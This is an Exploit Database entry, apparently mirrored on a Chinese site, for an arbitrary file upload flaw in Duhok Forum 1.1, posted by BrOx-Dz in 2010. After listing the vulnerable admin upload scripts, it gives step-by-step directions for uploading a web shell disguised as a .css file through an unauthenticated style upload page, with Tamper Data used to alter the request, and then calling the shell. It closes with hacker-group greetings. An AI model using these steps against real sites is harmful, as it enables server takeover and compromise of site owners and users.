Duhok Forum 1.1 – Arbitrary File Upload

• Exploit Database
• 123 阅读

• 作者： BrOx-Dz
  日期： 2010-11-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15638/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  ============================================== Duhok Forum Remot upload Vulnerability ==============================================   #################################################################### # Exploit Title: Duhok Forum Remot upload Shell Vulnerability # Date: 30-11-2010 # Author: BrOx-Dz # email : E.dz@hotmail.fr # Software Link: http://www.duhoktimes.com/df/ # Version: all version # Tested on: windows xp pack 3 linux ubuntu 10 # home: algerie // FreeGaza// ####################################################################   ===[Vulnerable File ]===   /admin/up_xml.php /admin/up_style.php /idara/up_xml.php /idara/up_style.php ===[ Exploit ]===   1- go www.site.com/patch/admin/up_style.php or www.site.com/patch/idara/up_style.php   2- upload shell "shell.css" and use tamper data   3- and go www.site.com/patch/slyle/style_shell.php     .. enjoy -- ####################################################################   greetz : kader11000 lagripe-dzmca_crb NetCat-Dzall dz members   www.h4kz.net www.v4-team.com www.vbspiders.comwww.dz4all.com/cc